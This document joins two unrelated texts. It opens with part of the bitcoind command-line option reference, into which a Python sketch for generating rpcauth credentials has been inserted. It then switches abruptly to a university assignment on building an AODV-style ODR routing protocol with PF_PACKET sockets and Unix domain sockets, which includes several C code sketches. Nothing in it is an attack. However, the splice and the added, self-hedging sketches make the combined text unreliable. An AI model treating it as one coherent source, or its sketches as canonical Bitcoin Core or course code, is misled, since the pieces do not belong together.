    Imports blocks from external file on startup
-maxmempool=<n>
    Keep the transaction memory pool below <n> megabytes (default: 300)
-maxorphantx=<n>
    Keep at most <n> unconnectable transactions in memory (default: 100)
-mempoolexpiry=<n>
    Do not keep transactions in the mempool longer than <n> hours (default: 336)
-par=<n>
    Set the number of script verification threads (-8 to 15, 0 = auto, <0 = leave that many cores free, default: 0)
-persistmempool
    Whether to save the mempool on shutdown and load on restart (default: 1)
-pid=<file>
    Specify pid file. Relative paths will be prefixed by a net-specific datadir location. (default: bitcoind.pid)
-prune=<n>
    Reduce storage requirements by enabling pruning (deleting) of old blocks. This allows the pruneblockchain RPC to be called to delete specific blocks, and enables automatic pruning of old blocks if a target size in MiB is provided. This mode is incompatible with -txindex and -rescan. Warning: Reverting this setting requires re-downloading the entire blockchain. (default: 0 = disable pruning blocks, 1 = allow manual pruning via RPC, >=550 = automatically prune block files to stay under the specified target size in MiB)
-reindex
    Rebuild chain state and block index from the blk*.dat files on disk
-reindex-chainstate
    Rebuild chain state from the currently indexed blocks. When in pruning mode or if blocks on disk might be corrupted, use full -reindex instead.
-settings=<file>
    Specify path to dynamic settings data file.
    Can be disabled with -nosettings. File is written at runtime and not meant to be edited by users (use bitcoin.conf instead for custom settings). Relative paths will be prefixed by datadir location. (default: settings.json)
-startupnotify=<cmd>
    Execute command on startup.
-sysperms
    Create new files with system default permissions, instead of umask 077 (only effective with disabled wallet functionality)
-txindex
    Maintain a full transaction index, used by the getrawtransaction rpc call (default: 0)
-version
    Print version and exit

Connection options:

-addnode=<ip>
    Add a node to connect to and attempt to keep the connection open (see the `addnode` RPC command help for more info). This option can be specified multiple times to add multiple nodes.
-asmap=<file>
    Specify asn mapping used for bucketing of the peers (default: ip_asn.map). Relative paths will be prefixed by the net-specific datadir location.
-bantime=<n>
    Default duration (in seconds) of manually configured bans (default: 86400)
-bind=<addr>[:<port>][=onion]
    Bind to given address and always listen on it (default: 0.0.0.0). Use [host]:port notation for IPv6. Append =onion to tag any incoming connections to that address and port as incoming Tor connections (default: 127.0.0.1:8334=onion, testnet: 127.0.0.1:18334=onion, signet: 127.0.0.1:38334=onion, regtest: 127.0.0.1:18445=onion)
-connect=<ip>
    Connect only to the specified node; -noconnect disables automatic connections (the rules for this peer are the same as for -addnode). This option can be specified multiple times to connect to multiple nodes.
-discover
    Discover own IP addresses (default: 1 when listening and no -externalip or -proxy)
-dns
    Allow DNS lookups for -addnode, -seednode and -connect (default: 1)
-dnsseed
    Query for peer addresses via DNS lookup, if low on addresses (default: 1 unless -connect used)
-externalip=<ip>
    Specify your own public address
-forcednsseed
    Always query for peer addresses via DNS lookup (default: 0)
-listen
    Accept connections from outside (default: 1 if no -proxy or -connect)
-listenonion
    Automatically create Tor onion service (default: 1)
-maxconnections=<n>
    Maintain at most <n> connections to peers (default: 125)
-maxreceivebuffer=<n>
    Maximum per-connection receive buffer, <n>*1000 bytes (default: 5000)
-maxsendbuffer=<n>
    Maximum per-connection send buffer, <n>*1000 bytes (default: 1000)
-maxtimeadjustment
    Maximum allowed median peer time offset adjustment. Local perspective of time may be influenced by peers forward or backward by this amount. (default: 4200 seconds)
-maxuploadtarget=<n>
    Tries to keep outbound traffic under the given target (in MiB per 24h). Limit does not apply to peers with 'download' permission. 0 = no limit (default: 0)
-networkactive
    Enable all P2P network activity (default: 1). Can be changed by the setnetworkactive RPC command
-onion=<ip:port>
    Use separate SOCKS5 proxy to reach peers via Tor onion services, set -noonion to disable (default: -proxy)
-onlynet=<net>
    Make outgoing connections only through network <net> (ipv4, ipv6 or onion). Incoming connections are not affected by this option. This option can be specified multiple times to allow multiple networks.
-peerblockfilters
    Serve compact block filters to peers per BIP 157 (default: 0)
-peerbloomfilters
    Support filtering of blocks and transactions with bloom filters (default: 0)
-permitbaremultisig
    Relay non-P2SH multisig (default: 1)
-port=<port>
    Listen for connections on <port>.
    Nodes not using the default ports (default: 8333, testnet: 18333, signet: 38333, regtest: 18444) are unlikely to get incoming connections.
-proxy=<ip:port>
    Connect through SOCKS5 proxy, set -noproxy to disable (default: disabled)
-proxyrandomize
    Randomize credentials for every proxy connection. This enables Tor stream isolation (default: 1)
-seednode=<ip>
    Connect to a node to retrieve peer addresses, and disconnect. This option can be specified multiple times to connect to multiple nodes.
-timeout=<n>
    Specify connection timeout in milliseconds (minimum: 1, default: 5000)
-torcontrol=<ip>:<port>
    Tor control port to use if onion listening enabled (default: 127.0.0.1:9051)
-torpassword=<pass>
    Tor control port password (default: empty)
-upnp
    Use UPnP to map the listening port (default: 0)
-whitebind=<[permissions@]addr>
    Bind to the given address and add permission flags to the peers connecting to it. Use [host]:port notation for IPv6. Allowed permissions: bloomfilter (allow requesting BIP37 filtered blocks and transactions), noban (do not ban for misbehavior; implies download), forcerelay (relay transactions that are already in the mempool; implies relay), relay (relay even in -blocksonly mode, and unlimited transaction announcements), mempool (allow requesting BIP35 mempool contents), download (allow getheaders during IBD, no disconnect after maxuploadtarget limit), addr (responses to GETADDR avoid hitting the cache and contain random records with the most up-to-date info). Specify multiple permissions separated by commas (default: download,noban,mempool,relay). Can be specified multiple times.
-whitelist=<[permissions@]IP address or network>
    Add permission flags to the peers connecting from the given IP address (e.g. 1.2.3.4) or CIDR-notated network (e.g. 1.2.3.0/24). Uses the same permissions as -whitebind. Can be specified multiple times.

Wallet options:

-addresstype
    What type of addresses to use ("legacy", "p2sh-segwit", or "bech32", default: "bech32")
-avoidpartialspends
    Group outputs by address, selecting all or none, instead of selecting on a per-output basis. Privacy is improved as an address is only used once (unless someone sends to it after spending from it), but may result in slightly higher fees as suboptimal coin selection may result due to the added limitation (default: 0 (always enabled for wallets with "avoid_reuse" enabled))
-changetype
    What type of change to use ("legacy", "p2sh-segwit", or "bech32"). Default is same as -addresstype, except when -addresstype=p2sh-segwit a native segwit output is used when sending to a native segwit address)
-disablewallet
    Do not load the wallet and disable wallet RPC calls
-discardfee=<amt>
    The fee rate (in BTC/kB) that indicates your tolerance for discarding change by adding it to the fee (default: 0.0001). Note: An output is discarded if it is dust at this rate, but we will always discard up to the dust relay fee and a discard fee above that is limited by the fee estimate for the longest target
-fallbackfee=<amt>
    A fee rate (in BTC/kB) that will be used when fee estimation has insufficient data. 0 to entirely disable the fallbackfee feature. (default: 0.00)
-keypool=<n>
    Set key pool size to <n> (default: 1000). Warning: Smaller sizes may increase the risk of losing funds when restoring from an old backup, if none of the addresses in the original keypool have been used.
-maxapsfee=<n>
    Spend up to this amount in additional (absolute) fees (in BTC) if it allows the use of partial spend avoidance (default: 0.00)
-mintxfee=<amt>
    Fees (in BTC/kB) smaller than this are considered zero fee for transaction creation (default: 0.00001)
-paytxfee=<amt>
    Fee (in BTC/kB) to add to transactions you send (default: 0.00)
-rescan
    Rescan the block chain for missing wallet transactions on startup
-spendzeroconfchange
    Spend unconfirmed change when sending transactions (default: 1)
-txconfirmtarget=<n>
    If paytxfee is not set, include enough fee so transactions begin confirmation on average within n blocks (default: 6)
-wallet=<path>
    Specify wallet path to load at startup. Can be used multiple times to load multiple wallets. Path is to a directory containing wallet data and log files. If the path is not absolute, it is interpreted relative to <walletdir>. This only loads existing wallets and does not create new ones. For backwards compatibility this also accepts names of existing top-level data files in <walletdir>.
-walletbroadcast
    Make the wallet broadcast transactions (default: 1)
-walletdir=<dir>
    Specify directory to hold wallets (default: <datadir>/wallets if it exists, otherwise <datadir>)
-walletnotify=<cmd>
    Execute command when a wallet transaction changes. %s in cmd is replaced by TxID and %w is replaced by wallet name. %w is not currently implemented on windows. On systems where %w is supported, it should NOT be quoted because this would break shell escaping used to invoke the command.
-walletrbf
    Send transactions with full-RBF opt-in enabled (RPC only, default: 0)

ZeroMQ notification options:

-zmqpubhashblock=<address>
    Enable publish hash block in <address>
-zmqpubhashblockhwm=<n>
    Set publish hash block outbound message high water mark (default: 1000)
-zmqpubhashtx=<address>
    Enable publish hash transaction in <address>
-zmqpubhashtxhwm=<n>
    Set publish hash transaction outbound message high water mark (default: 1000)
-zmqpubrawblock=<address>
    Enable publish raw block in <address>
-zmqpubrawblockhwm=<n>
    Set publish raw block outbound message high water mark (default: 1000)
-zmqpubrawtx=<address>
    Enable publish raw transaction in <address>
-zmqpubrawtxhwm=<n>
    Set publish raw transaction outbound message high water mark (default: 1000)
-zmqpubsequence=<address>
    Enable publish hash block and tx sequence in <address>
-zmqpubsequencehwm=<n>
    Set publish hash sequence message high water mark (default: 1000)

Debugging/Testing options:

-debug=<category>
    Output debugging information (default: -nodebug, supplying <category> is optional). If <category> is not supplied or if <category> = 1, output all debugging information. <category> can be: net, tor, mempool, http, bench, zmq, walletdb, rpc, estimatefee, addrman, selectcoins, reindex, cmpctblock, rand, prune, proxy, mempoolrej, libevent, coindb, qt, leveldb, validation.
-debugexclude=<category>
    Exclude debugging information for a category. Can be used in conjunction with -debug=1 to output debug logs for all categories except one or more specified categories.
-help-debug
    Print help message with debugging options and exit
-logips
    Include IP addresses in debug output (default: 0)
-logthreadnames
    Prepend debug output with name of the originating thread (only available on platforms supporting thread_local) (default: 0)
-logtimestamps
    Prepend debug output with timestamp (default: 1)
-maxtxfee=<amt>
    Maximum total fees (in BTC) to use in a single wallet transaction; setting this too low may abort large transactions (default: 0.10)
-printtoconsole
    Send trace/debug info to console (default: 1 when no -daemon. To disable logging to file, set -nodebuglogfile)
-shrinkdebugfile
    Shrink debug.log file on client startup (default: 1 when no -debug)
-uacomment=<cmt>
    Append comment to the user agent string

Chain selection options:

-chain=<chain>
    Use the chain <chain> (default: main). Allowed values: main, test, signet, regtest
-signet
    Use the signet chain. Equivalent to -chain=signet. Note that the network is defined by the -signetchallenge parameter
-signetchallenge
    Blocks must satisfy the given script to be considered valid (only for signet networks; defaults to the global default signet test network challenge)
-signetseednode
    Specify a seed node for the signet network, in the hostname[:port] format, e.g. sig.net:1234 (may be used multiple times to specify multiple seed nodes; defaults to the global default signet test network seed node(s))
-testnet
    Use the test chain. Equivalent to -chain=test.

Node relay options:

-bytespersigop
    Equivalent bytes per sigop in transactions for relay and mining (default: 20)
-datacarrier
    Relay and mine data carrier transactions (default: 1)
-datacarriersize
    Maximum size of data in data carrier transactions we relay and mine (default: 83)
-minrelaytxfee=<amt>
    Fees (in BTC/kB) smaller than this are considered zero fee for relaying, mining and transaction creation (default: 0.00001)
-whitelistforcerelay
    Add 'forcerelay' permission to whitelisted inbound peers with default permissions. This will relay transactions even if the transactions were already in the mempool. (default: 0)
-whitelistrelay
    Add 'relay' permission to whitelisted inbound peers with default permissions. This will accept relayed transactions even when not relaying transactions (default: 1)

Block creation options:

-blockmaxweight=<n>
    Set maximum BIP141 block weight (default: 3996000)
-blockmintxfee=<amt>
    Set lowest fee rate (in BTC/kB) for transactions to be included in block creation. (default: 0.00001)

RPC server options:

-rest
    Accept public REST requests (default: 0)
-rpcallowip=<ip>
    Allow JSON-RPC connections from specified source. Valid for <ip> are a single IP (e.g. 1.2.3.4), a network/netmask (e.g. 1.2.3.4/255.255.255.0) or a network/CIDR (e.g. 1.2.3.4/24). This option can be specified multiple times
-rpcauth=<userpw>
    Username and HMAC-SHA-256 hashed password for JSON-RPC connections. The field <userpw> comes in the format: <USERNAME>:<SALT>$<HASH>. A canonical python script is included in share/rpcauth. The client then connects normally using the rpcuser=<USERNAME>/rpcpassword=<PASSWORD> pair of arguments. This option can be specified multiple times
-rpcbind=<addr>[:port]
    Bind to given address to listen for JSON-RPC connections. Do not expose the RPC server to untrusted networks such as the public internet! This option is ignored unless -rpcallowip is also passed. Port is optional and overrides -rpcport. Use [host]:port notation for IPv6.
    This option can be specified multiple times (default: 127.0.0.1 and ::1 i.e., localhost)
-rpccookiefile=<loc>
    Location of the auth cookie. Relative paths will be prefixed by a net-specific datadir location. (default: data dir)
-rpcpassword=<pw>
    Password for JSON-RPC connections
-rpcport=<port>
    Listen for JSON-RPC connections on <port> (default: 8332, testnet: 18332, signet: 38332, regtest: 18443)
-rpcserialversion
    Sets the serialization of raw transaction or block hex returned in non-verbose mode, non-segwit(0) or segwit(1) (default: 1)
-rpcthreads=<n>
    Set the number of threads to service RPC calls (default: 4)
-rpcuser=<user>
    Username for JSON-RPC connections
-rpcwhitelist=<whitelist>
    Set a whitelist to filter incoming RPC calls for a specific user. The field <whitelist> comes in the format: <USERNAME>:<rpc 1>,<rpc 2>,...,<rpc n>. If multiple whitelists are set for a given user, they are set-intersected. See -rpcwhitelistdefault documentation for information on default whitelist behavior.
-rpcwhitelistdefault
    Sets default behavior for rpc whitelisting. Unless rpcwhitelistdefault is set to 0, if any -rpcwhitelist is set, the rpc server acts as if all rpc users are subject to empty-unless-otherwise-specified whitelists. If rpcwhitelistdefault is set to 1 and no -rpcwhitelist is set, rpc server acts as if all rpc users are subject to empty whitelists.
-server
    Accept command line and JSON-RPC commands
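The -rpcauth format above is easier to grasp with a concrete generator. Below is a hedged Python sketch modeled on the share/rpcauth script the help text mentions; the salt length and output wording here are assumptions, so treat the canonical script as authoritative:

import os, hmac

def generate_rpcauth(username, password):
    # Random 16-byte salt, hex-encoded (the exact length is an assumption)
    salt = os.urandom(16).hex()
    # HMAC-SHA-256 of the password, keyed by the salt, as the help text describes
    pw_hash = hmac.new(salt.encode('utf-8'), password.encode('utf-8'), 'SHA256').hexdigest()
    return 'rpcauth={}:{}${}'.format(username, salt, pw_hash)

print(generate_rpcauth('alice', 'correct horse battery staple'))
# Produces a line like rpcauth=alice:<SALT>$<HASH> for bitcoin.conf; the client
# then connects with rpcuser=alice / rpcpassword=<the original password>.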
SOYJUN / Implement ODR Protocol

Overview

For this assignment you will be developing and implementing:

- An On-Demand shortest-hop Routing (ODR) protocol for networks of fixed but arbitrary and unknown connectivity, using PF_PACKET sockets. The implementation is based on (a simplified version of) the AODV algorithm.
- Time client and server applications that send requests and replies to each other across the network using ODR.
- An API, implemented using Unix domain datagram sockets, that enables applications to communicate with the ODR mechanism running locally at their nodes.

I shall be discussing the assignment in class on Wednesday, October 29, and Monday, November 3.

The following should prove useful reference material for the assignment:

- Sections 15.1, 15.2, 15.4 & 15.6, Chapter 15, on Unix domain datagram sockets.
- PF_PACKET(7) from the Linux manual pages. You might find these notes made by a past CSE 533 student useful. Also, the following link http://www.pdbuchan.com/rawsock/rawsock.html contains useful code samples that use PF_PACKET sockets (as well as other code samples that use raw IP sockets, which you do not need for this assignment, though you will be using these types of sockets for Assignment 4).
- Charles E. Perkins & Elizabeth M. Royer. "Ad-hoc On-Demand Distance Vector Routing." Proceedings of the 2nd IEEE Workshop on Mobile Computing Systems and Applications, New Orleans, Louisiana, February 1999, pp. 90-100.

The VMware environment

minix.cs.stonybrook.edu is a Linux box running VMware. A cluster of ten Linux virtual machines, called vm1 through vm10, on which you can gain access as root and run your code, has been created on minix. See VMware Environment Hosts for further details. VMware instructions takes you to a page that explains how to use the system. The ten virtual machines have been configured into a small virtual intranet of Ethernet LANs whose topology is (in principle) unknown to you.

There is a course account cse533 on node minix, with home directory /users/cse533. In there, you will find a subdirectory Stevens/unpv13e, exactly as you are used to having on the cs system. You should develop your source code and makefiles for handing in accordingly. You will be handing in your source code on the minix node.

Note that you do not need to link against the socket library (-lsocket) in Linux. The same is true for -lnsl and -lresolv. For example, take a look at how the LIBS variable is defined for Solaris, in /home/courses/cse533/Stevens/unpv13e_solaris2.10/Make.defines (on compserv1, say):

LIBS = ../libunp.a -lresolv -lsocket -lnsl -lpthread

But if you take a look at Make.defines on minix (/users/cse533/Stevens/unpv13e/Make.defines) you will find only:

LIBS = ../libunp.a -lpthread

The nodes vm1, ....., vm10 are all multihomed: each has two (or more) interfaces. The interface 'eth0' should be completely ignored and is not to be used for this assignment (because it shows all ten nodes as if belonging to the same single Ethernet 192.168.1.0/24, rather than to an intranet composed of several Ethernets).

Note that vm1, ....., vm10 are virtual machines, not real ones. One implication of this is that you will not be able to find out what their (virtual) IP addresses are by using nslookup and such. To find out these IP addresses, you need to look at the file /etc/hosts on minix.
More to the point, invoking gethostbyname for a given vm will return to you only the (primary) IP address associated with the interface eth0 of that vm (which is the interface you will not be using). It will not return to you any other IP address for the node. Similarly, gethostbyaddr will return the vm node name only if you give it the (primary) IP address associated with the interface eth0 for the node. It will return nothing if you give it any other IP address for the node, even though the address is perfectly valid. Because of this, and because it will ease your task to be able to use gethostbyname and gethostbyaddr in a straightforward way, we shall adopt the (primary) IP addresses associated with interfaces eth0 as the 'canonical' IP addresses for the nodes (more on this below).

Time client and server

A time server runs on each of the ten vm machines. The client code should also be available on each vm so that it can be invoked at any of them. Normally, time clients/servers exchange request/reply messages using the TCP/UDP socket API that, effectively, enables them to receive service (indirectly, via the transport layer) from the local IP mechanism running at their nodes. You are to implement an API using Unix domain sockets to access the local ODR service directly (somewhat similar, in effect, to the way that raw sockets permit an application to access IP directly). Use Unix domain SOCK_DGRAM, rather than SOCK_STREAM, sockets (see Figures 15.5 & 15.6, pp. 418-419).

API

You need to implement a msg_send function that will be called by clients/servers to send requests/replies. The parameters of the function consist of:

- int giving the socket descriptor for write
- char* giving the 'canonical' IP address for the destination node, in presentation format
- int giving the destination 'port' number
- char* giving the message to be sent
- int flag: if set, force a route rediscovery to the destination node even if a non-'stale' route already exists (see below)

msg_send will format these parameters into a single char sequence which is written to the Unix domain socket that a client/server process creates. The sequence will be read by the local ODR from a Unix domain socket that the ODR process creates for itself. Recall that the 'canonical' IP address for a vm node is the (primary) IP address associated with the eth0 interface for the node. It is what will be returned to you by a call to gethostbyname.

Similarly, we need a msg_recv function which will do a (blocking) read on the application domain socket and return with:

- int giving the socket descriptor for read
- char* giving the message received
- char* giving the 'canonical' IP address for the source node of the message, in presentation format
- int* giving the source 'port' number

This information is written as a single char sequence by the ODR process to the domain socket that it creates for itself. It is read by msg_recv from the domain socket the client/server process creates, decomposed into the three components above, and returned to the caller of msg_recv. A small sketch of this framing idea appears a little further below. Also see the section below entitled ODR and the API.

Client

When a client is invoked at a node, it creates a domain datagram socket. The client should bind its socket to a 'temporary' (i.e., not 'well-known') sun_path name obtained from a call to tmpnam() (cf. line 10, Figure 15.6, p. 419) so that multiple clients may run at the same node. Note that tmpnam() is actually highly deprecated. You should use the mkstemp() function instead - look up the online man pages on minix ('man mkstemp') for details.
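To make the msg_send/msg_recv framing in the API section concrete, here is a minimal sketch, in Python rather than the C you will hand in, with an invented '|'-delimited wire format (the real assignment leaves the framing entirely up to you). A client writes a msg_send-style record to a Unix domain datagram socket, and an ODR-like process reads it back and decomposes it:

import os
import socket
import tempfile

ODR_PATH = '/tmp/odr_demo'  # hypothetical 'well-known' sun_path for the ODR process

# ODR side: bind a Unix domain datagram socket to its well-known path
if os.path.exists(ODR_PATH):
    os.unlink(ODR_PATH)
odr = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
odr.bind(ODR_PATH)

# Client side: bind to a temporary path (the mkstemp-style idea), then send
client_path = tempfile.mktemp(prefix='odr_client_')  # a socket path, not a file
client = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
client.bind(client_path)

def msg_send(sock, dest_ip, dest_port, msg, flag):
    # Format all parameters into a single char sequence, as the API requires
    record = '{}|{}|{}|{}'.format(dest_ip, dest_port, int(flag), msg)
    sock.sendto(record.encode(), ODR_PATH)

msg_send(client, '192.168.1.102', 13, 'time request', flag=0)

# ODR side: read the sequence back and decompose it into its components
data, src = odr.recvfrom(1024)
dest_ip, dest_port, flag, msg = data.decode().split('|', 3)
print('from', src, '->', dest_ip, dest_port, flag, repr(msg))

client.close(); odr.close()
os.unlink(client_path); os.unlink(ODR_PATH)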
Client

When a client is invoked at a node, it creates a domain datagram socket. The client should bind its socket to a ‘temporary’ (i.e., not ‘well-known’) sun_path name obtained from a call to tmpnam() (cf. line 10, Figure 15.6, p. 419) so that multiple clients may run at the same node. Note that tmpnam() is actually highly deprecated; you should use the mkstemp() function instead - look up the online man pages on minix (‘man mkstemp’) for details.

As you run client code again and again during the development stage, the temporary files created by the calls to tmpnam / mkstemp start to proliferate, since these files are not automatically removed when the client code terminates. You need to explicitly remove the file created by the client invocation by issuing a call to unlink() or to remove() in your client code just before it exits. See the online man pages on minix (‘man unlink’, ‘man remove’) for details. A sketch of this temporary-name binding appears after the steps below.

The client then enters an infinite loop repeating the following steps:

1. The client prompts the user to choose one of vm1, ..., vm10 as the server node.

2. The client msg_sends a 1 or 2 byte message to the server and prints out on stdout the message

client at node vm i1 sending request to server at vm i2

(In general, throughout this assignment, “trace” messages such as the one above should give the vm names, and not the IP addresses, of the nodes.)

3. The client then blocks in msg_recv awaiting the response. This attempt to read from the domain socket should be backed up by a timeout in case no response ever comes. I leave it up to you whether you ‘wrap’ the call to msg_recv in a timeout, or implement the timeout inside msg_recv itself. When the client receives a response, it prints out on stdout the message

client at node vm i1 : received from vm i2 <timestamp>

If, on the other hand, the client times out, it should print out the message

client at node vm i1 : timeout on response from vm i2

The client then retransmits the message, setting the flag parameter in msg_send to force a route rediscovery, and prints out an appropriate message on stdout. This is done only once, when a timeout for a given message to the server occurs for the first time.

The client repeats steps 1 - 3.
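Here is a minimal sketch of the temporary-name binding and cleanup described above; the /tmp template path and function name are illustrative, and error checking is omitted.

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Sketch: bind a client's domain datagram socket to a temporary sun_path. */
int make_client_socket(char *bound_path /* out: caller unlink()s this at exit */)
{
    char tmpl[] = "/tmp/odrcliXXXXXX";
    int tmpfd = mkstemp(tmpl);          /* creates a unique, empty file       */
    close(tmpfd);
    unlink(tmpl);                       /* bind() must create the name itself */

    int sockfd = socket(AF_LOCAL, SOCK_DGRAM, 0);
    struct sockaddr_un cliaddr;
    memset(&cliaddr, 0, sizeof(cliaddr));
    cliaddr.sun_family = AF_LOCAL;
    strncpy(cliaddr.sun_path, tmpl, sizeof(cliaddr.sun_path) - 1);
    bind(sockfd, (struct sockaddr *)&cliaddr, sizeof(cliaddr));

    strcpy(bound_path, tmpl);           /* remember the path for cleanup      */
    return sockfd;
}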
Server

The server creates a domain datagram socket. The server socket is assumed to have a (node-local) ‘well-known’ sun_path name, to which it binds. This ‘well-known’ sun_path name is designated by a (network-wide) ‘well-known’ ‘port’ value; the time client uses this ‘port’ value to communicate with the server. The server enters an infinite sequence of calls to msg_recv followed by msg_send, awaiting client requests and responding to them. When it responds to a client request, it prints out on stdout the message

server at node vm i1 responding to request from vm i2

ODR

The ODR process runs on each of the ten vm machines. It is invoked with a single command line argument which gives a “staleness” time parameter, in seconds. It uses get_hw_addrs (available to you on minix in ~cse533/Asgn3_code) to obtain the index and the associated (unicast) IP and Ethernet addresses of each of the node’s interfaces, except for the eth0 and lo (loopback) interfaces, which should be ignored.

In the subdirectory ~cse533/Asgn3_code (/users/cse533/Asgn3_code) on minix I am providing you with two functions, get_hw_addrs and prhwaddrs. These are analogous to the get_ifi_info_plus and prifinfo_plus of Assignment 2. Like get_ifi_info_plus, get_hw_addrs uses ioctl. get_hw_addrs gets the (primary) IP address, alias IP addresses (if any), HW address, and interface name and index value for each of the node's interfaces (including the loopback interface lo); prhwaddrs prints that information out. You should modify and use these functions as needed. Note that if an interface has no HW address associated with it (this is typically the case for the loopback interface lo, for example), then ioctl returns to get_hw_addrs a HW address which is the equivalent of 00:00:00:00:00:00. get_hw_addrs stores this in the appropriate field of its data structures, as it would any HW address returned by ioctl, but when prhwaddrs comes across such an address, it prints a blank line instead of its usual ‘HWaddr = xx:xx:xx:xx:xx:xx’.

The ODR process creates one or more PF_PACKET sockets. You will need to try out PF_PACKET sockets for yourselves and familiarize yourselves with how they behave. If, when you read from the socket and provide a sockaddr_ll structure, the kernel returns to you the index of the interface on which the incoming frame was received, then one socket will be enough. Otherwise, somewhat in the manner of Assignment 2, you shall have to create a PF_PACKET socket for every interface of interest (which are all the interfaces of the node, excluding lo and eth0), and bind a socket to each interface. Furthermore, if the kernel also returns to you the source Ethernet address of the frame in the sockaddr_ll structure, then you can make do with SOCK_DGRAM type PF_PACKET sockets; otherwise you shall have to use SOCK_RAW type sockets (although I would prefer you to use SOCK_RAW type sockets anyway, even if it turns out you can make do with SOCK_DGRAM).

The socket(s) should have a protocol value (no larger than 0xffff, so that it fits in two bytes; this value is given as a network-byte-order parameter in the call(s) to the socket function) that identifies your ODR protocol. The <linux/if_ether.h> include file (i.e., the file /usr/include/linux/if_ether.h) contains protocol values defined for the standard protocols typically found on an Ethernet LAN, as well as other values such as ETH_P_ALL. You should set protocol to a value of your choice which is not a <linux/if_ether.h> value, but which is, hopefully, unique to yourself. Remember that you will all be running your code using the same root account on the vm1, ..., vm10 nodes; if two of you happen to choose the same protocol value and happen to be running on the same vm node at the same time, your applications will receive each other’s frames. For that reason, try to choose a protocol value that is likely to be unique to yourself (something based on your Stony Brook student ID number, for example). This value effectively becomes the protocol value for your implementation of ODR, as opposed to some other CSE 533 student’s implementation. Because your value of protocol is to be carried in the frame type field of the Ethernet frame header, the value chosen should be not less than 1536 (0x600), so that it is not misinterpreted as the length of an Ethernet 802.3 frame.
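The call itself might look as follows; the value 0x733A is illustrative only (base yours on something unique to you, keeping it at or above 0x0600 and distinct from the <linux/if_ether.h> values).

#include <sys/socket.h>
#include <arpa/inet.h>          /* htons */

#define PROTO_ODR 0x733A        /* illustrative; choose your own value */

/* Sketch: open one SOCK_RAW PF_PACKET socket for the ODR protocol.
   This requires root, which is how you run on the vm nodes anyway. */
int open_odr_socket(void)
{
    /* The protocol travels in the frame type field of the Ethernet
       header, so socket() takes it in network byte order. */
    return socket(PF_PACKET, SOCK_RAW, htons(PROTO_ODR));
}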
Note from the man pages for packet(7) that frames are passed to and from the socket without any processing of the frame content by the device driver on the other side of the socket, except for calculating and appending the 4-byte CRC trailer to outgoing frames, and stripping that trailer before delivering incoming frames to the socket. Nevertheless, if you write a frame that is less than 60 bytes, the necessary padding is automatically added by the device driver so that the frame actually transmitted is of the minimum Ethernet size of 64 bytes. When reading from the socket, however, any such padding that was introduced into a short frame at the sending node to bring it up to the minimum frame size is not stripped off; it is included in what you receive from the socket (thus, the number of bytes you receive should never be less than 60).

Also, you will have to build the frame header for outgoing frames yourselves (assuming you use SOCK_RAW type sockets). Bear in mind that the field values in that header have to be in network byte order.

The ODR process also creates a domain datagram socket for communication with application processes at the node, and binds the socket to a ‘well-known’ sun_path name for the ODR service.

Because it is dealing with fixed topologies, ODR is, by and large, considerably simpler than AODV. In particular, discovered routes are relatively stable, so there is no need for all the paraphernalia that goes with the possibility of routes changing (such as maintenance of active nodes in the routing tables and timeout mechanisms; timeouts on reverse links; the lifetime field in RREP messages; etc.). Nor will we be implementing source_sequence_#s (in the RREQ messages) or dest_sequence_#s (in RREQ and RREP messages). In reality, we should (though, for the sake of simplicity, we will not) implement some sort of sequence number mechanism, or an alternative mechanism such as split horizon, if we are to avoid possible routing loops in a “count to infinity” scenario (I shall explain this point in class). However, we want ODR to discover shortest-hop paths, and to do so in a reasonably efficient manner. This necessitates having one or two aspects of its operation work in a different, possibly slightly more complicated, way than AODV does.

ODR has several basic responsibilities.

(1) Build and maintain a routing table. For each destination in the table, the routing table structure should include, at a minimum, the next-hop node (in the form of the Ethernet address of that node) and outgoing interface index, the number of hops to the destination, and a timestamp of when the routing table entry was made or last “reconfirmed” / updated. Note that a destination node in the table is to be identified only by its ‘canonical’ IP address, and not by any other IP addresses the node has.
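One possible in-memory layout for such an entry is sketched below; the field names and the linked-list organization are assumptions, not requirements.

#include <time.h>
#include <netinet/in.h>        /* INET_ADDRSTRLEN */

/* Sketch of a routing-table entry covering the minimum fields above. */
struct rtentry {
    char dest_ip[INET_ADDRSTRLEN];   /* destination 'canonical' IP         */
    unsigned char next_hop[6];       /* Ethernet address of next-hop node  */
    int if_index;                    /* outgoing interface index           */
    int hop_count;                   /* number of hops to the destination  */
    time_t timestamp;                /* made / last reconfirmed or updated */
    struct rtentry *next;            /* simple linked-list organization    */
};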
(2) Generate a RREQ in response to a time client calling msg_send for a destination for which ODR has no route (or for which a route exists, but msg_send has the flag parameter set or the route has gone ‘stale’ – see below), and ‘flood’ the RREQ out on all the node’s interfaces (except for the interface it came in on and, of course, the interfaces eth0 and lo). Flooding is done using an Ethernet broadcast destination address (ff:ff:ff:ff:ff:ff) in the outgoing frame header. Note that a copy of the broadcast packet is supposed to / might be looped back to the node that sends it (see p. 535 in the Stevens textbook); ODR will have to take care not to treat these copies as new incoming RREQs. Also note that ODR at the client node increments the broadcast_id every time it issues a new RREQ for any destination node.

(3) When a RREQ is received, ODR has to generate a RREP if it is at the destination node, or if it is at an intermediate node that happens to have a route (which is not ‘stale’ – see below) to the destination. Otherwise, it must propagate the RREQ by flooding it out on all the node’s interfaces (except the interface the RREQ arrived on). Note that as it processes received RREQs, ODR should enter the ‘reverse’ route back to the source node into its routing table, or update an existing entry back to the source node if the RREQ received shows a shorter-hop route, or a route with the same number of hops but going through a different neighbour. The timestamp associated with the table entry should be updated whenever an existing route is either “reconfirmed” or updated. Obviously, if the node is going to generate a RREP, updating an existing entry back to the source node with a more efficient route, or a same-hops route using a different neighbour, should be done before the RREP is generated.

Unlike AODV, when an intermediate node receives a RREQ for which it generates a RREP, it should nevertheless continue to flood the RREQ it received if the RREQ pertains to a source node whose existence it has heretofore been unaware of, or gives it a more efficient route back to the source node than it knew of (the reason for continuing to flood the RREQ is so that other nodes in the intranet also become aware of the existence of the source node, or of the potentially more optimal reverse route to it, and update their tables accordingly). However, since a RREP for this RREQ is being sent by our node, we do not want other nodes which receive the RREQ propagated by our node, and which might be in a position to do so, to also send RREPs. So we need to introduce a field in the RREQ message, not present in the AODV specification, which acts as a “RREP already sent” field. Our node sets this field before further propagating the RREQ, and nodes receiving a RREQ with this field set do not send RREPs in response, even if they are in a position to do so.

